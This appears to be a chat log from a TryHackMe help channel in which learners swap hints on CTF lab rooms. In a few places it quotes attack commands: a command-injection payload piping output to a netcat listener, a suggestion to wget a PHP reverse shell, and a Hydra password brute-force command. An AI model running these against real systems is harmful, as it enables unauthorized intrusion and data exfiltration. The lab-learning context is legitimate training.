What does "print out" mean? The only thing I did was cat it
I'm on the Learn Linux room on task 43. I'm trying to access the /root directory. Could someone point me towards the right direction?
Never mind, I figured it out
I'm doing Madness from THM, and I'm on the stego part. I've noticed the extension of the file is .jpg but in hex the header is PNG. I've tried changing and renaming it from both ends but still can't open the image; I've used binwalk, steghide, and stegextract but no luck
please enlighten me 😆
I would look more into the hex of the header you spotted and maybe look into magic numbers
I was able to solve it by replacing the PNG file signature with the JPG signature in its header
yet I'm stuck again with this cipher y2RPJ4QaPF!B 😆
tried ROT13, ROT47 and Caesar, nothing seems to match
and as far as I know, there is no hash that matches it
where'd you get that?
from the CTF's hidden directory
I was just left with this "Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B"
Room: Blue
When I upload my launcher from PS Empire and run it, it says
"Could Not Find C:%~f0"
Edit: I'll forward this to #room-help
Room Linux Challenges. Find flag12 where the motd is stored. I've read the man page and tried the files where the motd can be stored, including /run, but no flag12. Hint?
Nm, got it. Note to self: remember grep's -i flag.
@ebon heron have you tried different combinations of bash operators?
@verbal wedge as in ||, && and so on operators?
Indeed
Also keep in mind nc won't work
So you'll need to research some different ways of spawning shells
I've gotten it to give me a shell for www-data
Well there ya go lol
but i suspect the last flag is in a certain folder
Indeed. The only flag :)
hi there, in the room Injection, Task 3 Blind Injection, when we try to test the redirection there is an issue: the directory /var/www/html doesn't have write permissions. As an intermediate user I can circumvent this problem, but if the idea is to demonstrate Blind Injection this doesn't work:
input field
||ls -la /var/www |nc 10.8.12.175 1234
kali
nc -lnvp 1234
listening on [any] 1234 ...
.
.
drwxr-xr-x 4 root root 4096 May 26 01:47 html
@white salmon It is still blind injection
You have code execution
You're choosing to redirect the output over the network via netcat
yeap, the first thing I tried, according to the room description, was to redirect; it was only an observation to facilitate testing for other users, I think, who don't know how to redirect to netcat
You converted a blind RCE into regular RCE
That's all
It's still a blind RCE vuln
It asked you to redirect to a file
ok, sorry, I always think as a teacher, and of ways to make my students understand, hehe
this was a question from them, they tried to redirect and see the result directly on http://ip/result.txt, thanks
@white salmon Interesting question, but as you can't write to the directory I don't think it'd work
@stuck fractal Precisely, that was the suggestion: that /var/www/html have write permissions for www-data, so that it would be easier to test. But this works well, it does not matter. Maybe it can be a suggestion to the room's author, thanks again
@white salmon I'm speaking to the author now, I think the directory was meant to be writeable by www-data
I managed to break the box in other ways
Yes I apologize for the confusion
The goal was to just demonstrate simple blind injection which I feel I've accomplished but I will make the www-data directory writable by www-data
As suggested
@verbal wedge thanks, this will make the room more educational, I think 🙂
Yeah no problem. Simple oversight by me
Glad you liked it
Opening up write perms will make room for uh... interesting things
like wget a full php rev shell
Easter 4 on CTF collection Vol. 2
@white salmon
Did you have any luck in figuring this out? I tried a bunch of stuff with sqlmap, but I don't know it well at all.
I will probably get stuck on Easter 5 as it is an SQL thing again.
That room may be above me at the mo, but I couldn't find an SQL learning room in TryHackMe either
@odd nebula If you want to learn sql, I recommend sololearn
There's more SQLi content coming soon
I've had my fair share of issues with it.
I haven't worked on it much, because I couldn't figure out what to read from the table.
@stuck fractal thanks again. I'll look into it.
Before I look blindly, is sololearn a learning site like THM, or is it here?
It's a programming learning platform
@stuck fractal
I'll go and see what I can find right now.
School school school haha
@stuck fractal looks interesting. I'll see what it brings.
@white salmon
@NinjaJc01 recommended sololearn to me. I'll be looking there. It may help you too.
I saw.
Of course.
https://tryhackme.com/room/introtox8664 any hints on crackme2? :)
got the ||disk|| on Mr Robot and ||got the strings from it into a file||, any hints on what I should be looking for in it?
can I have a hint on Willow? I accessed the ||nfs export|| and found an ||rsa_keys file||
is that a rabbit hole?
ok
are the keys supposed to be slices into the string or something?
@trail badger Would you be able to give me a hint on the learn linux? I am overthinking it.
Read the hint -- I, uh, wrote a whole blog post on RSA encryption/decryption with numeric keys
/m @trail badger hi
I was just talking to someone in russian
am I meant to bruteforce the SSH passphrase on Willow?
@inland onyx or what?
I decrypted the RSA
and got the key
but it says it has a passphrase
and I am not able to bruteforce it with rockyou
having trouble with the room Steel Mountain
the CVE he asks for.. I looked on exploit-db but the answer is incorrect?
@shrewd verge solved.. no need to include CVE- in the answer
Can someone help on TASK 4 ==> #5 flag1 text [Web Exploitation] [Medium] Jurassic Park in HACKBACK 2019? I found the first flag text, but when I copy-paste the flag, it shows wrong flag
@vernal ridge It's a known bug.
You could wait till Dark fixes it, or you could pm me and show me the incorrect flag and I'll send you the correct one.
I have the incorrect flag, I shall PM you
@ripe rock I went to sleep last night 😂
I am new, can anyone give me a hint for King of the Hill Carnage?
@white quartz KOTH boxes are supposed to be rooted on your own. No one is going to help with that
only for a hint
@white quartz well, I haven't rooted Carnage yet either, but I believe LFI/RCE is the right way to do it.
thanks
A port scanner should wake it up. I know mine does.
I tried but the SSH is still filtered
I tried configuring the iptables too, but couldn't open the SSH port
@tidal sedge can I DM about this buddy?
I'm obviously missing something with the XSS room getting Jack's cookie via stored XSS. I have a message posted with code that'll re-direct to my server, and I'm catching my own cookie when I refresh the page, but nothing from Jack.
can I have a hint about Willow? I think I'm being very stupid, I'm on the last part
I just found root's password, but I have no idea how to go forward
login as root?
I did
and I checked root.txt
and it says ||This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!||
backtrack then
look back at everything you did
maybe something will be accessible now that wasn't earlier
ok
augh, I feel stupid
idk how to go forward
I've gone back and looked at everything I did
nothing new
errrmmm I'm having a problem with the Steel Mountain room
What's up?
I did find the CVE and it's in msf
but it does not work?
well, I tried to exec ping commands.. same issues
Need a bit more information than that. So you found the Metasploit exploit, and you input your settings. Did you ensure that your RHOST, RPORT, LHOST and LPORT are correct?
Steel Mountain doesn't respond to pings if I remember correctly.
IIRC that exploit also has SRV parameters
Hey there! Can someone help with 1 task I can't get through? (Learn Linux task 43)
I just set RHOST and RPORT with LHOST and LPORT according to my notes Ninja.
Hello 🙂
We saw your question. If/when someone is available to help with that one they will Xaw. 🙂
ok thanks 🙂
I'm trying to finish the Learn Linux room and am stuck on the last task
only just figured out 2>>/dev/null is pushing all errors to null
but either way I need to access a file in /root/root.txt as another user
I'm not sure what was the process of getting root on this machine
but try
sudo -l
I found a file with a nice name: .sudo_as_admin_successful, but no idea what to do with it
user shiba4 can't run sudo :/
the only users I can see are shiba1 2 3 4 and nootnoot
but can't see the password for nootnoot
cat /etc/passwd will show you all the users
no, normally the last couple of users
ok thank you
They are all users.
and root being always at the top
They are not all users that you created.
wait are you sure?
I know I did log into shiba2 but don't remember the password for it
ok
You can log in to all the shibas if you have reached task 43
it's task 21
yeah, found it and logged in but still can't run sudo -l
I don't think I've ever logged into shiba3 or nootnoot or noot
You have logged into shiba3
Yes
if you followed along, yes
in order to gain access to shiba4, you had to be shiba3
hmm ok
yeah i did all of that
let me check
you are right, shiba3:happynootnoises
but still no sudo luck
keep trying....
can I please get a hint? 😄 I've been stuck on this for a while
Don't post the answers please @surreal kite
sorry!
Look for files on the system that belong to each and every user. Investigate suspicious ones
try using the find command
just a quick one: when I look for files through find / -user shiba3 -type f 2>>/dev/null it shows lots of /proc/ files, it won't be there, will it?
Can someone help on TASK 10 ==> #3 flag3 HACKBACK 2019? I got 4 ports, and the SSH port is filtered. I tried to open the SSH port by knocking the 4 ports I found, but I couldn't open the SSH port; then I looked into the walkthrough from @minor bough but it didn't work either
probably not @surreal kite
can anyone give a hint on the final stage of CTF 100?
can I have a hint on getting the agent name for Agent Sudo?
@patent token oooo.. I gain now .. ;D
w ||test||
I finished it
Please don't just jump from task to task asking for hints without putting the work in first.
rikk, I'm going to just do you a favor and advise you to read rule 13
I'm new, I don't know where to put my hands on
Google.
I don't even know what a SOCKS server is
Ok. We are happy to help those who help themselves. If you need assistance with learning to research, we can even try to help with that.
google it
If you don't know what a Socks4a server is, you can research that. It's a proxy server that allows you to connect through it to other machines, networks, etc. As for your Task7, #3 question, the answer is actually in the question itself.
I also recommend doing that room if you haven't already, and if you have, heading back there for another peek.
so for this question "What is running on the higher port?" I nmap scanned UDP for the ports and it's asking for a 3 character answer? can I get a hint
PORT STATE SERVICE
21/udp closed ftp
80/udp closed http
2222/udp closed msantipiracy
How did you setup the scan?
how did you specify ports? It shouldn't pull up those ports if they're closed; you should run a -p- instead
Why scan UDP?
@white salmon Please state the room, task and question number
I think I know the room, probably simple CTF
Usually helps to know where you are ;)
yeah oops haha
guys, any hint regarding the_final_exam binary in the radare2 room? I can't quite figure out what the getpw function does
@wanton shuttle try and figure out what a special function does ||get-password ||
@wanton shuttle try and input some simple strings to help with that
Hey all, currently enjoying the delights of CTF100 but all jammed up on flag75, anyone about to give me a little nudge with a hint?
@median compass you just need to search really really really hard. Then bang your head once you find it
lol @torn mural I really really really thought I had searched as hard as I could, I'll go search again and prepare for the head banging so, cheers!
@median compass if it helps, linpeas might reveal something, although, still well hidden
back to the grind so, thanks again!
hey, stuck on Learn Linux task 33, mkdir test says permission denied. I see I don't have write access on the home directory but I'm having trouble changing it, if that's even what I'm supposed to do
That means you're in the wrong working directory
You haven't moved to your home directory
/home != your home directory @rotund skiff
alright, found it hahah, thanks
Hey, I would love a hint for running Hydra in the ToolsRus room
I think I'm getting the syntax wrong somehow, first http-get-form was running but no hits, now it's asking for the http-get module, why idk..
hydra $IP -V -t 1 -l bob -P passwords.txt http-get "/protected:password=^PASS^:incorrect" -I
Why do you have password= for http basic auth?
don't need that, eh
wow this is so much faster
Learn Linux 43: I see a file in nootnoot, am I on the right track?
never mind, file is empty
ooh got it
@rotund skiff you got it? I'm working on it now, and found the same file about half an hour ago. I can log in as noot, but have not figured out how to log in to nootnoot or whether I'm on track or not.
@edgy cradle that file is not important. There is a file belonging to one of the users that is important; you'll have to run a find command to find it. That file will give you more information
lmk if you need more info
OK thank you!